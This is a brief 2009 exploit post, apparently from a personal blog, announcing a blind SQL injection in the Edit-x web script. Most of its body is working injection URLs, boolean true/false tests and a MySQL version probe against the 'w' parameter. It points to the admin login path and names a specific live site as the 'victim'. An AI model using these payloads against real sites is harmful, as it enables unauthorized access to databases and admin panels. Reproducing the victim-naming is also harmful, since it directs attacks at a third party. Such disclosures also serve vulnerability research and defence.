07 October 2009

EDIT-X BLIND SQL INJECTION

================================================
scripts : Edit-x
Vendor : http://www.edit-x.com
Discovered by : irvian
================================================


http://site.com/index.php?w=6%27+and+1=1/* <-- true
http://site.com/index.php?w=6%27+and+1=2/* <-- false

http://site.com/index.php?w=6%27+and+MID%28@@version,1,1%29=4/* <-- true
http://site.com/index.php?w=6%27+and+MID%28@@version,1,1%29=5/* <-- false


Admin login:
http://site.com/editx/index.php

victim:
http://www.maddockpro.com

0 komentar:

powered by irvian